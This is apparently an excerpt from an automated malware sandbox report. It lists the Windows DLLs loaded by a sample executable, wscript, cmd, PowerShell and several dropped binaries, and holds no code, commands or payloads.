Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: mscoree.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: kernel.appcore.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: version.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: uxtheme.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: windows.storage.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: wldp.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: profapi.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: cryptsp.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: rsaenh.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: cryptbase.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: sspicli.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: mscoree.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: kernel.appcore.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: version.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: uxtheme.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: windows.storage.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: wldp.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: profapi.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: cryptsp.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: rsaenh.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: cryptbase.dll
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: mmdevapi.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: ksuser.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: avrt.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: audioses.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: midimap.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
